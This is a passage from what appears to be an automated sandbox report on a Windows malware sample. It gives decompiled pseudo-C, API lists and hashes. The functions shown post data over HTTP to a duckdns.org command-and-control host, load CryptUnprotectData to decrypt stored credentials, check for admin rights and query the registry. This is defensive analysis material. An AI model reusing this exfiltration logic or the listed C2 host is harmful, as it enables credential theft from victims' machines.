				 *(_t369 + 0x10) =  &_v388;
				 *((intOrPtr*)(_t369 + 0x14)) = 0x100;
				 *((intOrPtr*)(_t369 + 0x1c)) =  &_v516;
				 *((intOrPtr*)(_t369 + 0x20)) = 0x80;
				 *((intOrPtr*)(_t369 + 0x24)) =  &_v644;
				 *((intOrPtr*)(_t369 + 0x28)) = 0x80;
				 *(_t369 + 0x2c) =  &_v2692;
				 *((intOrPtr*)(_t369 + 0x30)) = 0x800;
				 *((intOrPtr*)(_t369 + 0x34)) =  &_v3716;
				 *((intOrPtr*)(_t369 + 0x38)) = 0x400;
				_t223 = E00403790(_v56);
				InternetCrackUrlA(E00403990(_v56), _t223, 0x90000000, _t369);
				E004036DC( &_v100,  *(_t369 + 0x10));
				E004039F0(_v100, 4, E00403790(_v100) - 3,  &_v69416);
				if(E00403A78(0x418c60, _v69416) != 0) {
					_v73 = 1;
					E004036DC( &_v69420,  *(_t369 + 0x10));
					E004037DC( &_v88, _v69420, "Host: ");
					E00417F6C(_v100, _t325,  &_v69424, _t369, _t371);
					 *(_t369 + 0x10) = E00403990(_v69424);
				}
				_t326 = InternetOpenA("Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)", 0, 0, 0, 0);
				 *(_t369 + 0x10) = 0x41b7c0;
				_v84 = 0x2dc6c0;
				_v48(_t326, 6,  &_v84, 4);
				_v48(_t326, 5,  &_v84, 4);
				_v64 = InternetConnectA(_t326,  *(_t369 + 0x10),  *(_t369 + 0x18), 0, 0, 3, 0, 0);
				if(_v64 != 0) {
					_v80 = 0x84003300;
					E004036DC( &_v69428,  *((intOrPtr*)(_t369 + 4)));
					if(E00403A78(0x418cb4, _v69428) != 0) {
						_v80 = _v80 | 0x00800000;
					}
					_v68 = HttpOpenRequestA(_v64, E00403990(_v16),  *(_t369 + 0x2c), 0, 0, 0, _v80, 0);
					if(_v68 != 0) {
						if(_v73 != 0) {
							_v32(_v68, E00403990(_v88), E00403790(_v88), 0xa0000000);
						}
						_t284 = E00403790(_v12);
						if(HttpSendRequestA(_v68, E00418CB8, 0, E00403990(_v12), _t284) != 0) {
							do {
								E00404F00();
								_v72 = _v40(_v68,  &_v69412, 0x10064,  &_v60);
								E004035D4( &_v96, _v60,  &_v69412);
								_t298 = E00403798( &_v92, _v96);
								asm("sbb eax, eax");
							} while (_t298 + 1 != 0 && _v60 != 0);
						}
					}
					InternetCloseHandle(_v68); // executed
				}
				 *_t371(_v64);
				 *_t371(_t326);
				if(_v92 == 0) {
					_push(_v100);
					_push(_v12);
					_push( *(_t369 + 0x18));
					_push( &_v92);
					E004036DC( &_v69432,  *(_t369 + 0x2c));
					_push(_v69432);
					E004036DC( &_v69436,  *(_t369 + 0x10));
					_pop(_t358); // executed
					E00418124(_v69436, _t326, _v16, _t358, _t371); // executed
				}
				E00403538(_a4, _v92);
				E004034E4( &_v92);
				_pop(_t351);
				 *[fs:eax] = _t351;
				_push(E00418B87);
				E00403508( &_v69436, 6);
				E00403508( &_v100, 4);
				E00403508( &_v56, 2);
				return E00403508( &_v16, 3);
			}























































                                                                                                                                                                                              0x00418689
                                                                                                                                                                                              0x0041868c
                                                                                                                                                                                              0x00418691
                                                                                                                                                                                              0x00418691
                                                                                                                                                                                              0x00418693
                                                                                                                                                                                              0x00418695
                                                                                                                                                                                              0x00418695
                                                                                                                                                                                              0x00418698
                                                                                                                                                                                              0x00418699
                                                                                                                                                                                              0x00418699
                                                                                                                                                                                              0x0041869f
                                                                                                                                                                                              0x004186a2
                                                                                                                                                                                              0x004186a5
                                                                                                                                                                                              0x004186ab
                                                                                                                                                                                              0x004186b3
                                                                                                                                                                                              0x004186bb
                                                                                                                                                                                              0x004186c0
                                                                                                                                                                                              0x004186c8
                                                                                                                                                                                              0x004186c9
                                                                                                                                                                                              0x004186ce
                                                                                                                                                                                              0x004186d1
                                                                                                                                                                                              0x004186d8
                                                                                                                                                                                              0x004186e2
                                                                                                                                                                                              0x004186e2
                                                                                                                                                                                              0x004186ea
                                                                                                                                                                                              0x004186f5
                                                                                                                                                                                              0x004186fa
                                                                                                                                                                                              0x00418706
                                                                                                                                                                                              0x00418719
                                                                                                                                                                                              0x0041871d
                                                                                                                                                                                              0x00418728
                                                                                                                                                                                              0x0041872d
                                                                                                                                                                                              0x0041872d
                                                                                                                                                                                              0x00418731
                                                                                                                                                                                              0x0041873b
                                                                                                                                                                                              0x0041874d
                                                                                                                                                                                              0x0041874d
                                                                                                                                                                                              0x00418761
                                                                                                                                                                                              0x00418776
                                                                                                                                                                                              0x0041878b
                                                                                                                                                                                              0x004187a0
                                                                                                                                                                                              0x004187b5
                                                                                                                                                                                              0x004187ca
                                                                                                                                                                                              0x004187df
                                                                                                                                                                                              0x004187f5
                                                                                                                                                                                              0x0041880c
                                                                                                                                                                                              0x00418817
                                                                                                                                                                                              0x00418827
                                                                                                                                                                                              0x00418837
                                                                                                                                                                                              0x00418847
                                                                                                                                                                                              0x00418857
                                                                                                                                                                                              0x00418867
                                                                                                                                                                                              0x00418873
                                                                                                                                                                                              0x00418878
                                                                                                                                                                                              0x00418881
                                                                                                                                                                                              0x00418884
                                                                                                                                                                                              0x00418891
                                                                                                                                                                                              0x00418894
                                                                                                                                                                                              0x004188a1
                                                                                                                                                                                              0x004188a4
                                                                                                                                                                                              0x004188b1
                                                                                                                                                                                              0x004188b4
                                                                                                                                                                                              0x004188c1
                                                                                                                                                                                              0x004188c4
                                                                                                                                                                                              0x004188d1
                                                                                                                                                                                              0x004188d4
                                                                                                                                                                                              0x004188e4
                                                                                                                                                                                              0x004188f3
                                                                                                                                                                                              0x004188fc
                                                                                                                                                                                              0x0041891d
                                                                                                                                                                                              0x00418934
                                                                                                                                                                                              0x00418936
                                                                                                                                                                                              0x00418943
                                                                                                                                                                                              0x00418956
                                                                                                                                                                                              0x00418964
                                                                                                                                                                                              0x00418974
                                                                                                                                                                                              0x00418974
                                                                                                                                                                                              0x00418987
                                                                                                                                                                                              0x00418989
                                                                                                                                                                                              0x00418991
                                                                                                                                                                                              0x004189a1
                                                                                                                                                                                              0x004189ad
                                                                                                                                                                                              0x004189c7
                                                                                                                                                                                              0x004189ce
                                                                                                                                                                                              0x004189d4
                                                                                                                                                                                              0x004189e4
                                                                                                                                                                                              0x004189fb
                                                                                                                                                                                              0x004189fd
                                                                                                                                                                                              0x004189fd
                                                                                                                                                                                              0x00418a24
                                                                                                                                                                                              0x00418a2b
                                                                                                                                                                                              0x00418a35
                                                                                                                                                                                              0x00418a52
                                                                                                                                                                                              0x00418a52
                                                                                                                                                                                              0x00418a58
                                                                                                                                                                                              0x00418a77
                                                                                                                                                                                              0x00418a79
                                                                                                                                                                                              0x00418a84
                                                                                                                                                                                              0x00418aa0
                                                                                                                                                                                              0x00418aaf
                                                                                                                                                                                              0x00418aba
                                                                                                                                                                                              0x00418ac3
                                                                                                                                                                                              0x00418ac6
                                                                                                                                                                                              0x00418a79
                                                                                                                                                                                              0x00418a77
                                                                                                                                                                                              0x00418ad4
                                                                                                                                                                                              0x00418ad4
                                                                                                                                                                                              0x00418ada
                                                                                                                                                                                              0x00418add
                                                                                                                                                                                              0x00418ae3
                                                                                                                                                                                              0x00418ae8
                                                                                                                                                                                              0x00418aec
                                                                                                                                                                                              0x00418af1
                                                                                                                                                                                              0x00418af5
                                                                                                                                                                                              0x00418aff
                                                                                                                                                                                              0x00418b0a
                                                                                                                                                                                              0x00418b14
                                                                                                                                                                                              0x00418b22
                                                                                                                                                                                              0x00418b23
                                                                                                                                                                                              0x00418b23
                                                                                                                                                                                              0x00418b2e
                                                                                                                                                                                              0x00418b36
                                                                                                                                                                                              0x00418b3d
                                                                                                                                                                                              0x00418b40
                                                                                                                                                                                              0x00418b43
                                                                                                                                                                                              0x00418b53
                                                                                                                                                                                              0x00418b60
                                                                                                                                                                                              0x00418b6d
                                                                                                                                                                                              0x00418b7f

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418714
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418728
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418748
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-0000000C), ref: 0041875C
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-0000001A), ref: 00418771
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-0000002B), ref: 00418786
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-0000003C), ref: 0041879B
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-00000053), ref: 004187B0
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-00000064), ref: 004187C5
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-00000075), ref: 004187DA
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-00000089), ref: 004187F0
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-0000009B), ref: 00418807
                                                                                                                                                                                              • InternetCrackUrlA.WININET(00000000,00000000,90000000,?,00000000,-0000009B,00000000,-00000089,00000000,-00000075,00000000,-00000064,00000000,-00000053,00000000,-0000003C), ref: 004188F3
                                                                                                                                                                                              • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1),00000000,00000000,00000000,00000000,?,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C), ref: 00418984
                                                                                                                                                                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000), ref: 004189C4
                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,84003300,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000), ref: 00418A21
                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00418CB8,00000000,00000000,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418A72
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418AD4
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$Internet$HandleHttpLibraryLoadOpenRequest$CloseConnectCrackModuleSend
                                                                                                                                                                                              • String ID: .bit$Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$POST$aca1cab2451.duckdns.org$wininet.dll
                                                                                                                                                                                              • API String ID: 3386017226-128824149
                                                                                                                                                                                              • Opcode ID: 54202a251d383afa9b440f1367a32a84581cecc305caedb9dc7d948c89e5b3e5
                                                                                                                                                                                              • Instruction ID: 8c20cc009bbb13acc87624f3a171753233ac08310759435a2e91fadf7e7a38d5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 54202a251d383afa9b440f1367a32a84581cecc305caedb9dc7d948c89e5b3e5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 33E1EBB1910218ABDB10EFA5CC86BDEBBBCBF44305F10417AF504B7681DB78AA458B58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0040955E, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 10libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E0040955E() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t3;

				 *0x41c7cc =  *0x41c7cc - 1;
				if( *0x41c7cc < 0) {
					_t2 = LoadLibraryA("crypt32.dll"); // executed
					_t3 = GetProcAddress(_t2, "CryptUnprotectData");
					 *0x41c7c8 = _t3;
					return _t3;
				}
				return _t1;
			}






                                                                                                                                                                                              0x00409560
                                                                                                                                                                                              0x00409567
                                                                                                                                                                                              0x00409573
                                                                                                                                                                                              0x00409579
                                                                                                                                                                                              0x0040957e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040957e
                                                                                                                                                                                              0x00409583

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(crypt32.dll,CryptUnprotectData), ref: 00409573
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,crypt32.dll), ref: 00409579
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                                              • String ID: CryptUnprotectData$crypt32.dll
                                                                                                                                                                                              • API String ID: 2574300362-1827663648
                                                                                                                                                                                              • Opcode ID: 0420e119ad5bb52e5c2197864a8ef738be67dd0fb3c4c8377fbeb38080e5296e
                                                                                                                                                                                              • Instruction ID: 1936ed15528034ef1a8706b88be01f12f22861c51f7a066308f0a1848fab801f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0420e119ad5bb52e5c2197864a8ef738be67dd0fb3c4c8377fbeb38080e5296e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 89C04CF368030376CF466B779D4A5462294B7C1B1D760493BF511B11D2D6BC8D404F5D
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00401870, Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                                                              			E00401870() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00401926);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x41c5b4);
				L004011C4();
				if( *0x41c035 != 0) {
					_push(0x41c5b4);
					L004011CC();
				}
				E00401234(0x41c5d4);
				E00401234(0x41c5e4);
				E00401234(0x41c610);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x41c60c = _t11;
				if( *0x41c60c != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x41c60c; // 0x0
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x41c5f8)) = 0x41c5f4;
					 *0x41c5f4 = 0x41c5f4;
					 *0x41c600 = 0x41c5f4;
					 *0x41c5ac = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E0040192D);
				if( *0x41c035 != 0) {
					_push(0x41c5b4);
					L004011D4();
					return 0;
				}
				return 0;
			}








                                                                                                                                                                                              0x00401875
                                                                                                                                                                                              0x00401876
                                                                                                                                                                                              0x0040187b
                                                                                                                                                                                              0x0040187e
                                                                                                                                                                                              0x00401881
                                                                                                                                                                                              0x00401886
                                                                                                                                                                                              0x00401892
                                                                                                                                                                                              0x00401894
                                                                                                                                                                                              0x00401899
                                                                                                                                                                                              0x00401899
                                                                                                                                                                                              0x004018a3
                                                                                                                                                                                              0x004018ad
                                                                                                                                                                                              0x004018b7
                                                                                                                                                                                              0x004018c3
                                                                                                                                                                                              0x004018c8
                                                                                                                                                                                              0x004018d4
                                                                                                                                                                                              0x004018d6
                                                                                                                                                                                              0x004018db
                                                                                                                                                                                              0x004018db
                                                                                                                                                                                              0x004018e3
                                                                                                                                                                                              0x004018e7
                                                                                                                                                                                              0x004018e8
                                                                                                                                                                                              0x004018f4
                                                                                                                                                                                              0x004018f7
                                                                                                                                                                                              0x004018f9
                                                                                                                                                                                              0x004018fe
                                                                                                                                                                                              0x004018fe
                                                                                                                                                                                              0x00401907
                                                                                                                                                                                              0x0040190a
                                                                                                                                                                                              0x0040190d
                                                                                                                                                                                              0x00401919
                                                                                                                                                                                              0x0040191b
                                                                                                                                                                                              0x00401920
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00401920
                                                                                                                                                                                              0x00401925

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
                                                                                                                                                                                              • RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
                                                                                                                                                                                              • RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 730355536-0
                                                                                                                                                                                              • Opcode ID: 099da0d79779097dabcbbe4e17eced4135313adf81f8614c79238fcf2f8b4282
                                                                                                                                                                                              • Instruction ID: 5328ea8a61f1b3c3886908a4d7eb6976bfaff4b38786c7c23389d9dab3a387f7
                                                                                                                                                                                              • Opcode Fuzzy Hash: 099da0d79779097dabcbbe4e17eced4135313adf81f8614c79238fcf2f8b4282
                                                                                                                                                                                              • Instruction Fuzzy Hash: 06015BB0684390AEE719AB6A9C967957F92D749704F05C0BFE100BA6F1CB7D5480CB1E
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00407C58, Relevance: 4.6, APIs: 3, Instructions: 80COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 27%
                                                                                                                                                                                              			E00407C58() {
				long _v8;
				short _v10;
				char _v14;
				long _v20;
				long _v24;
				void* _v28;
				union _SID_NAME_USE _v32;
				char _v36;
				char _t21;
				short _t22;
				intOrPtr _t24;
				intOrPtr* _t26;
				intOrPtr* _t42;
				void* _t44;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t56;
				intOrPtr _t57;

				_t54 = _t56;
				_t57 = _t56 + 0xffffffe0;
				_v8 = 0;
				_t21 =  *0x41b0d0; // 0x0
				_v14 = _t21;
				_t22 =  *0x41b0d4; // 0x500
				_v10 = _t22;
				_t24 =  *0x41b0cc; // 0x12
				_t26 =  *0x41b5b0; // 0x41c720
				 *((intOrPtr*)( *_t26))( &_v14, 1, _t24, 0, 0, 0, 0, 0, 0, 0,  &_v28, _t53);
				if(_v28 == 0) {
					return _v8;
				} else {
					 *[fs:eax] = _t57;
					_v20 = 0;
					_v24 = 0;
					LookupAccountSidA(0, _v28, 0,  &_v20, 0,  &_v24,  &_v32); // executed
					_t42 =  *0x41b56c; // 0x41c72c
					_t44 =  *((intOrPtr*)( *_t42))(0, _v28,  &_v36,  *[fs:eax], 0x407d16, _t54); // executed
					if(_t44 != 0) {
						_v8 = _v36;
					} else {
						_v8 = 0;
					}
					_pop(_t52);
					 *[fs:eax] = _t52;
					_push(E00407D1D);
					return FreeSid(_v28);
				}
			}






















                                                                                                                                                                                              0x00407c59
                                                                                                                                                                                              0x00407c5b
                                                                                                                                                                                              0x00407c60
                                                                                                                                                                                              0x00407c63
                                                                                                                                                                                              0x00407c69
                                                                                                                                                                                              0x00407c6c
                                                                                                                                                                                              0x00407c73
                                                                                                                                                                                              0x00407c89
                                                                                                                                                                                              0x00407c95
                                                                                                                                                                                              0x00407c9c
                                                                                                                                                                                              0x00407ca2
                                                                                                                                                                                              0x00407d23
                                                                                                                                                                                              0x00407ca4
                                                                                                                                                                                              0x00407caf
                                                                                                                                                                                              0x00407cb4
                                                                                                                                                                                              0x00407cb9
                                                                                                                                                                                              0x00407cd9
                                                                                                                                                                                              0x00407ce5
                                                                                                                                                                                              0x00407cec
                                                                                                                                                                                              0x00407cf0
                                                                                                                                                                                              0x00407cfc
                                                                                                                                                                                              0x00407cf2
                                                                                                                                                                                              0x00407cf4
                                                                                                                                                                                              0x00407cf4
                                                                                                                                                                                              0x00407d01
                                                                                                                                                                                              0x00407d04
                                                                                                                                                                                              0x00407d07
                                                                                                                                                                                              0x00407d15
                                                                                                                                                                                              0x00407d15

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LookupAccountSidA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00407D16), ref: 00407CD9
                                                                                                                                                                                              • CheckTokenMembership.KERNELBASE(00000000,00000000,?), ref: 00407CEC
                                                                                                                                                                                              • FreeSid.ADVAPI32(00000000,00407D1D), ref: 00407D10
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccountCheckFreeLookupMembershipToken
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1602037265-0
                                                                                                                                                                                              • Opcode ID: 2fd40f1cd6d938c6e5d16d2cd6dc980c4c8d1b789cf8552ef7046a50898a570f
                                                                                                                                                                                              • Instruction ID: 099d520652cb879bdf47a43f009fc20e3076d83f6f5b891ba4a5cda1263a2b72
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fd40f1cd6d938c6e5d16d2cd6dc980c4c8d1b789cf8552ef7046a50898a570f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7821A475A04209AFDB41CFA8DC51FEEB7F8EB48700F104466EA14E7290E775AA01DBA5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00401F5C, Relevance: 3.1, APIs: 2, Instructions: 124COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00401870: RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
                                                                                                                                                                                                • Part of subcall function 00401870: RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
                                                                                                                                                                                                • Part of subcall function 00401870: LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
                                                                                                                                                                                                • Part of subcall function 00401870: RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920
                                                                                                                                                                                              • RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,004020D8), ref: 00401FA7
                                                                                                                                                                                              • RtlLeaveCriticalSection.KERNEL32(0041C5B4,004020DF), ref: 004020D2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2227675388-0
                                                                                                                                                                                              • Opcode ID: 0c1c8bb305bbff8ba2aa7aa2b7d32e669c82bb45643f7d7afb35836f5abc82eb
                                                                                                                                                                                              • Instruction ID: 60aaef5d71d1198278099ac2c9ce8b9a20775f5f033974ed56173d7c89f55220
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c1c8bb305bbff8ba2aa7aa2b7d32e669c82bb45643f7d7afb35836f5abc82eb
                                                                                                                                                                                              • Instruction Fuzzy Hash: DA41CDB1A813019FD714CF29DDC56AABBA1EB59318B24C27FD505E77E1E378A841CB08
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00407B78, Relevance: 3.1, APIs: 2, Instructions: 84COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000000,00407C46), ref: 00407C19
                                                                                                                                                                                              • FreeSid.ADVAPI32(00000000,00407C4D), ref: 00407C40
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CheckFreeMembershipToken
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3914140973-0
                                                                                                                                                                                              • Opcode ID: 02d2a01e1651f1c233edb1ebec011e8a64dd2af6dca5e3f4e19433a4a010ba8d
                                                                                                                                                                                              • Instruction ID: aed4e80559fb2a14190837efd407bda22eaf0f983d9af5a1b784dce0b7ff3491
                                                                                                                                                                                              • Opcode Fuzzy Hash: 02d2a01e1651f1c233edb1ebec011e8a64dd2af6dca5e3f4e19433a4a010ba8d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 60214F75A48388BEE701DBA8CC41FAE77FCEB09704F4084B6E610E3291D775AA098759
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00407B77, Relevance: 3.1, APIs: 2, Instructions: 80COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000000,00407C46), ref: 00407C19
                                                                                                                                                                                              • FreeSid.ADVAPI32(00000000,00407C4D), ref: 00407C40
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CheckFreeMembershipToken
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3914140973-0
                                                                                                                                                                                              • Opcode ID: 85f5b30b1e39150e1c8e346ace12111ea4b56de602e113dca3c1568075f88dab
                                                                                                                                                                                              • Instruction ID: f84fb7a27dacd8e4143a25a8c882f6f2bfcd0e0861e01e35ab8e7fc80b6cb224
                                                                                                                                                                                              • Opcode Fuzzy Hash: 85f5b30b1e39150e1c8e346ace12111ea4b56de602e113dca3c1568075f88dab
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A216075A48248BEE701CBA8CC81FAE77F8EB0D704F5084B6F610E36D1D775AA058B59
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00407500, Relevance: 3.1, APIs: 2, Instructions: 76registryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 55%
                                                                                                                                                                                              			E00407500(void* __eax, void* __ebx, char __ecx, char __edx, intOrPtr _a4, char _a8) {
				char _v8;
				char _v12;
				int _v16;
				int _v20;
				void* _v24;
				char _v536;
				intOrPtr* _t43;
				intOrPtr* _t52;
				void* _t56;
				intOrPtr _t63;
				void* _t67;

				_v12 = __ecx;
				_v8 = __edx;
				_t56 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				_push(_t67);
				_push(0x4075e3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffdec;
				_v20 = 0xfe;
				_v536 = 0;
				if(_a8 != 1) {
					RegOpenKeyExW(_t56, E00403D3C(_v8), 0, 0x20019,  &_v24); // executed
				} else {
					_t52 =  *0x41b574; // 0x41c71c
					 *((intOrPtr*)( *_t52))(_t56, E00403D3C(_v8), 0, 0x20119,  &_v24);
				}
				RegQueryValueExW(_v24, E00403D3C(_v12), 0,  &_v16,  &_v536,  &_v20); // executed
				E00403D10(_a4, 0x100,  &_v536);
				_t43 =  *0x41b58c; // 0x41c718
				 *((intOrPtr*)( *_t43))(); // executed
				_t63 = _t56;
				 *[fs:eax] = _t63;
				_push(E004075EA);
				return E00403B98( &_v12, 2);
			}














                                                                                                                                                                                              0x0040750a
                                                                                                                                                                                              0x0040750d
                                                                                                                                                                                              0x00407510
                                                                                                                                                                                              0x00407515
                                                                                                                                                                                              0x0040751d
                                                                                                                                                                                              0x00407524
                                                                                                                                                                                              0x00407525
                                                                                                                                                                                              0x0040752a
                                                                                                                                                                                              0x0040752d
                                                                                                                                                                                              0x00407530
                                                                                                                                                                                              0x00407537
                                                                                                                                                                                              0x00407544
                                                                                                                                                                                              0x00407582
                                                                                                                                                                                              0x00407546
